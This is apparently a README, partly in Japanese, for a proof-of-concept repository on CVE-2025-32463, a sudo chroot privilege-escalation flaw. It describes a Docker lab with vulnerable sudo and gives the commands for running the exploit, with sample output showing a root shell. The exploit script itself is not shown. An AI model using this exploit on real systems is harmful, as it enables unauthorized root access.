
Proof-of-concept exploit for CVE-2025-32463, a privilege-escalation vulnerability in sudo's chroot feature. Includes Docker environment and exploit script to spawn a root shell.
このリポジトリは、sudoのchroot機能におけるCVE‑2025‑32463特権昇格の脆弱性を実証するための、最小限かつ再現可能な環境を提供します。
| ファイル | 目的 |
|---|---|
| Dockerfile | 脆弱なsudo 1.9.16p2とビルドツールを含むUbuntu 24.04イメージをビルドします |
| sudo‑chwoot.sh | chroot内でrootシェルを起動する概念実証エクスプロイト |
| run.sh | イメージを(必要に応じて)ビルドし、エクスプロイトコンテナを起動するヘルパースクリプト |
ほとんどのLinuxディストリビューションにおいて、sudo 1.9.14から1.9.17までの脆弱なビルド(すべてのpリビジョンを含む)が影響を受けます。
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
run.shはDockerに--privilegedと--rmを渡し、終了時にコンテナが自動的にクリーンアップされるようにします。
完了したらイメージを削除します:
docker rmi sudo-chwoot